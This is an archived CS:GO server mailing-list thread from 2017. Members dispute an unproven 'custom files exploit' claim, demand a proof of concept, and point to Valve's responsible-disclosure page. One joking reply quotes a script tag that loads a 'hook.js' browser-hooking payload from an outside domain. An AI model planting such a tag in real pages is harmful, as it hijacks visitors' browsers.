ITSec. PoC. Sincerely, Ryan "ExpertMode" Bentley Independent IT Field Engineer
On Tue, Oct 10, 2017 at 6:50 PM, Nathaniel Theis <[email protected]> wrote: > hello I have injected a JavaScript into this email you are all now hacked > > what do you mean it won't run without an actual vulnerability > > you're super mega hacked > > <script src=//xmppwocky.net/hook.js></script> > > On Oct 10, 2017 10:02 AM, "iNilo" <[email protected]> wrote: > >> I frankly don't care what / where / how you work, or what you have >> studied. >> >> The only thing I know is that this is clearly the wrong channel to do >> argue/disclose/chat about. >> >> http://www.valvesoftware.com/security/ >> >> Hopefully you get thanked in a patch note, if not I'm sure the entire >> community will be grateful that you disclosed a major security issue to the >> people that *actually *get paid to take care of this. >> >> Thanks. >> >> >> >> 2017-10-10 18:54 GMT+02:00 Saint K. <[email protected]>: >> >>> Christopher, >>> >>> >>> >>> I work in “the field” as you like to call it. It’s customary to explain >>> the exploit in detail and provide proof the concept (hence the request for >>> a PoC) in any form or way. >>> >>> >>> >>> Please demonstrate the issue, it be by posting the offending code, you >>> recording a video showing a working exploit, or anything along these lines. >>> >>> >>> >>> You should know this, if you work in “the field”. >>> >>> >>> >>> Regards, >>> >>> >>> >>> Saint K. >>> >>> >>> >>> *From:* Csgo_servers [mailto:[email protected]] >>> *On Behalf Of *Stealth Mode >>> *Sent:* 10 October 2017 18:34 >>> *To:* [email protected] >>> *Subject:* Re: [Csgo_servers] Custom files exploit >>> >>> >>> >>> @Ryan, etc. >>> >>> >>> >>> I studied radio electronics before IT was a thing. NetSec and ITSec go >>> hand in hand. My credentials aren't CS, because CS was radio electronics. >>> The industry hasn't changed, just a little more vulnerable. Not like I am >>> specifically stating how to inject code, or what code to inject on a public >>> mailing list. Don't need to. Professionals here know what I am referring >>> to. I guess the rest do not have the knowledge to understand what the >>> exploit can actually do. You are aware. That is all that matters. Don't >>> secure your servers, that is on you. When they get exploited, that is on >>> you. >>> >>> >>> >>> Have a nice day! End of discussion. No further communications. >>> >>> >>> >>> Sincerely, >>> >>> Christopher "StealthMode" Stephen Larkins >>> >>> Independent IT Field Engineer >>> >>> fieldnation.com >>> >>> workmarket.com >>> >>> onforce.com >>> >>> clearancejobs.com >>> >>> >>> >>> >>> >>> On Tue, Oct 10, 2017 at 12:09 PM, Ryan Bentley <[email protected]> wrote: >>> >>> My sides at this thread. At first I just rolled my eyes but now I >>> actually believe that Stealth Mode is either a troll or delusional. Please >>> stop saying "ITSec". Any first year CS student knows what PoC is but you >>> don't? Please. >>> >>> You are embarrassing yourself. Which institution did you get your >>> degree? It must be a very old BSc indeed. You talk complete nonsense and >>> have a fundamental misunderstanding of basic computer science tenets. >>> >>> >>> >>> On Tue, Oct 10, 2017 at 4:34 PM, Nomaan Ahmad <[email protected]> >>> wrote: >>> >>> Nice hat there. Stealth might get this one though: >>> https://i.imgur.com/329jfXt.gif >>> >>> >>> >>> On 10 Oct 2017 4:29 pm, "PistonMiner" <[email protected]> wrote: >>> >>> The person in question should never have written a message about an open >>> vulnerability into a public mailing list in the first place. Just because >>> they did doesn't mean that you should ask for PoCs in public mailing lists, >>> there's a multitude of issues with that. >>> To make it perfectly clear, I'm not defending this person, I seriously >>> doubt the seriousness of their statements and a lot of what they're saying >>> makes no sense at all and looks like trying to maintain an image of >>> competence while knowing little, but responsible disclosure still applies. >>> If this person has a vulnerability to report, they should do so with the >>> information listed at http://www.valvesoftware.com/security/. >>> And I think I know what I'm talking about seeing as I have two Finder's >>> Fees. See https://wiki.teamfortress.com/wiki/Finder%27s_Fee and >>> https://wiki.teamfortress.com/wiki/List_of_Finder%27s_Fee_owners >>> >>> On 10.10.2017 17:08, Vaya wrote: >>> >>> I think someone needs to ‘stealth mode’ out of this email chain. This is >>> just noise without a repeatable Test >>> >>> Sent from my iPhone >>> >>> >>> On 10 Oct 2017, at 16:01, PistonMiner <[email protected]> wrote: >>> >>> If you have a vulnerability to report, don't do it in a public mailing >>> list. Report it directly to Valve, and no place else. This conversation has >>> so many problems, but asking for a PoC in a *public* mailing list is >>> one of them. Look up responsible disclosure. (I should note though, at this >>> point I am not convinced a vulnerability even exists.) >>> >>> -- >>> >>> PistonMiner (Linus S.) >>> >>> _______________________________________________ >>> Csgo_servers mailing list >>> [email protected] >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >>> >>> >>> _______________________________________________ >>> >>> Csgo_servers mailing list >>> >>> [email protected] >>> >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >>> >>> >>> -- >>> >>> PistonMiner (Linus S.) >>> >>> >>> _______________________________________________ >>> Csgo_servers mailing list >>> [email protected] >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >>> >>> _______________________________________________ >>> Csgo_servers mailing list >>> [email protected] >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >>> >>> >>> >>> _______________________________________________ >>> Csgo_servers mailing list >>> [email protected] >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >>> >>> >>> _______________________________________________ >>> Csgo_servers mailing list >>> [email protected] >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >> >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> > > _______________________________________________ > Csgo_servers mailing list > [email protected] > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >
_______________________________________________ Csgo_servers mailing list [email protected] https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
